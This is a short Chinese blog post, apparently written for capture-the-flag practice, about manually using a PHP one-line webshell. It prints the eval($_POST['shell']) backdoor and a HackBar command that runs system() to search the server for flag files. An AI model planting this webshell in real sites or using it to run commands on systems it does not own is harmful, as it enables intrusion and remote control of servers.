路漫漫其修远兮,吾将上下而求索

导航

php一句话马的手工利用

比如下面的一句话php

<?php @eval($_POST['shell']);?>

通过在hackbar中输入shell=system("find / -name 'flag*'");就可以查找本地flag文件(末尾带上分号;)

 同样windows系统也可以执行系统命令

 

 

参考:

一句话木马(webshell)是如何执行命令的_t1r0的技术博客_51CTO博客 

命令执行漏洞 - 再简单一点点 - 博客园 

posted on 2021-09-26 14:50  爱在西元间  阅读(227)  评论(0编辑  收藏  举报